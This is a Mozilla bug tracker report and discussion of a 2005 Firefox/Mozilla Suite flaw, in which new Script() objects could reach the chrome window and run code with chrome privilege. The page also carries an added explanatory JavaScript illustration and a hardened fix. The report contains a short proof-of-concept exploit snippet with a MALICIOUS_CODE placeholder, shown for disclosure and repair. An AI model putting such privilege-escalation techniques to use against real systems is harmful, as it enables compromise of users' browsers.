Closed Bug 290908 Opened 20 years ago Closed 20 years ago

new Script() can access chrome window and run arbitrary code with chrome privilege

Categories

(Core :: Security, defect)

x86
Windows XP
defect
Not set
normal

Tracking

()

RESOLVED FIXED

People

(Reporter: moz_bug_r_a4, Assigned: brendan)

References

Details

(Keywords: fixed-aviary1.0.4, fixed1.7.8, Whiteboard: [sg:fix] trunk version rolled into 281988)

Attachments

(4 files)

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3

Firefox 1.0.3: missingPluginInstaller.prototype.newMissingPlugin (in browser.js) is another event handler that can be used to make chrome access a non-DOM JS property (related to Bug 289961).

Mozilla 1.7.7: hrefForClickEvent (in contentAreaClick.js) is the function that can be used to make chrome access a non-DOM JS property (related to Bug 290324).

There is a way to circumvent the fix represented in bug 289074 comment 79. The code in a Script object can access |arguments.callee.__parent__|, which is the chrome window, and |arguments.callee.__parent__.eval()| is executed with chrome privilege.

Exploit:

    var scriptCode = "arguments.callee.__parent__.eval('" + MALICIOUS_CODE + "');'';";
    var script = (function() {
      function x() { new Object(); }
      return new Script(scriptCode);
    })();
    document.body.__defineGetter__("type", script);
    var event = document.createEvent("Events");
    event.initEvent("PluginNotFound", true, true);
    document.body.dispatchEvent(event);

Note: it is important how the Script object is created. A, B, and C cause this error: "Error: arguments is not defined". I don't know why D can access |arguments|.

A)
    var script = new Script(scriptCode);

B)
    var script = (function() { return new Script(scriptCode); })();

C)
    var script = (function() {
      function x() { "a"; }
      return new Script(scriptCode);
    })();

D)
    // any Object (window, document, new Array(), ...)
    var anyObj = new Object();
    var script = (function() {
      function x() { anyObj; }
      return new Script(scriptCode);
    })();

I have confirmed that the following testcases work in:
[Firefox] Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3
[Mozilla Suite] Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414

Reproducible: Always

Steps to Reproduce:
Attached file testcase 1 (deleted) —
for Firefox/1.0.3
Attached file testcase 2 (deleted) —
for Mozilla/1.7.7
Attached file testcase 3 (deleted) —
each of the ways to create Script object
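The report above hinges on one step that is easy to miss: a chrome-side event handler reads a plain JS property (|type|) off a content-controlled object, and a content-defined getter therefore runs on the chrome call stack. The following is an added illustration, not code from the bug report or from Mozilla; it models only that step in modern JavaScript (there is no |__parent__| or |Script| constructor in current engines, so the chrome-window escape itself is not reproduced, and the actual fix landed in the JS engine, not in the caller). The names chromeHandlerNaive, chromeHandlerSafe, readDataProperty and makeContentObject, and the "image/png" value, are hypothetical and constructed for the example.

```javascript
// Added illustration (not code from the bug report): a privileged ("chrome")
// handler that dereferences a property on a content-controlled object will run
// a content-defined accessor in the privileged caller's context. The hardened
// variant reads only own data properties, so no content code can run.

const log = [];  // constructed: records when the content getter executes

// Simulated chrome-side handler, modelled on a chrome event handler that reads
// event.target.type: it naively dereferences a property on a content object.
function chromeHandlerNaive(target) {
  return String(target.type);          // invokes a content accessor if one exists
}

// Hardened reader: accept only an own *data* property. Inherited properties and
// accessor properties (which would execute content code) are treated as absent.
function readDataProperty(obj, name) {
  const desc = Object.getOwnPropertyDescriptor(obj, name);
  if (desc === undefined || "get" in desc || "set" in desc) {
    return undefined;
  }
  return desc.value;
}

function chromeHandlerSafe(target) {
  const t = readDataProperty(target, "type");
  return t === undefined ? "" : String(t);
}

// Content side: define an accessor on the object chrome will inspect, mirroring
// document.body.__defineGetter__("type", script) in the bug's testcase. Here the
// getter merely records that it ran instead of evaluating attacker code.
function makeContentObject() {
  const obj = {};
  Object.defineProperty(obj, "type", {
    get() { log.push("content getter ran"); return "image/png"; },
    configurable: true,
  });
  return obj;
}

// Run the naive handler against the content object: the getter fires.
function runNaive() {
  log.length = 0;
  const result = chromeHandlerNaive(makeContentObject());
  return { result, getterRan: log.length > 0 };
}

// Run the hardened handler: the accessor is refused and nothing of content's runs.
function runSafe() {
  log.length = 0;
  const result = chromeHandlerSafe(makeContentObject());
  return { result, getterRan: log.length > 0 };
}

console.log("naive:", runNaive());
console.log("safe: ", runSafe());
```

The point of the hardened reader is not the specific property but the rule: privileged code that must look at content objects should read own data properties only, or copy the values it needs through a wrapper that cannot invoke content-defined accessors.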
Testcase 1 is quite clever. Another bounty for moz_bug_r_a4! The patch in bug 290324 stops testcase 2. Testcase 3 merely shows how to get an outer function invocation to have an activation (Call in SpiderMonkey) object: nest an inner function that uses a non-local identifier. /be
Assignee: dveditz → brendan
Status: UNCONFIRMED → NEW
Ever confirmed: true
(In reply to comment #4)
> The patch in bug 290324 stops testcase 2.

No, it's the suite version of testcase 1.
Er, dbaron points out that testcase 2 is for the suite. It's the suite version of testcase 1, I guess. More tomorrow. Thanks again, moz_bug_r_a4. /be
Status: NEW → ASSIGNED
Blocks: sbb?
Flags: blocking-aviary1.1+
Flags: blocking-aviary1.0.4+
Whiteboard: [sg:fix]
the more js can interact with chrome, the more exploits. especially if chrome executes js.
Attached patch fix (deleted) — Splinter Review
Attachment #181234 - Flags: superreview?(dbaron)
Attachment #181234 - Flags: review?(jst)
Attachment #181234 - Flags: approval1.7.8?
Attachment #181234 - Flags: approval-aviary1.0.4?
Comment on attachment 181234 [details] [diff] [review]
fix

jst, feel free to review too. /be
Attachment #181234 - Flags: review?(jst) → review?(shaver)
Thanks to bz for some productive discussion, part of which suggested this patch. /be
Comment on attachment 181234 [details] [diff] [review]
fix

I really don't understand this anymore, but sr=dbaron.
Attachment #181234 - Flags: superreview?(dbaron) → superreview+
Flags: blocking1.8b2+
Flags: blocking1.7.8+
Depends on: 281988
Whiteboard: [sg:fix] → [sg:fix] trunk version rolled into 281988
Flags: blocking1.8b2+
Flags: blocking-aviary1.1+
Comment on attachment 181234 [details] [diff] [review]
fix

Got dveditz and drivers approval on IRC. Checking in, with the same change to obj_eval (indirect call error). /be
Attachment #181234 - Flags: approval1.7.8?
Attachment #181234 - Flags: approval1.7.8+
Attachment #181234 - Flags: approval-aviary1.0.4?
Attachment #181234 - Flags: approval-aviary1.0.4+
Checked into branches. /be
Status: ASSIGNED → RESOLVED
Closed: 20 years ago
Resolution: --- → FIXED
Flags: blocking-aviary1.0.5+ → blocking-aviary1.0.4+
Attachment #181234 - Flags: approval-aviary1.0.5+ → approval-aviary1.0.4+
other than the attached test cases, are there other areas or things we could test to ensure that this didn't regress anything? thanks!
In Firefox 1.0.4/winxp, I am getting the following for testcase 3:

A) ReferenceError: arguments is not defined
B) ReferenceError: arguments is not defined
C) ReferenceError: arguments is not defined
D) [object Object]

Was D) supposed to be fixed?
Clearing security flag from announced vulnerabilities fixed in Firefox 1.0.4/Mozilla 1.7.8
Group: security
Blocks: sbb+
No longer blocks: sbb?
Flags: testcase+
Flags: in-testsuite+ → in-testsuite?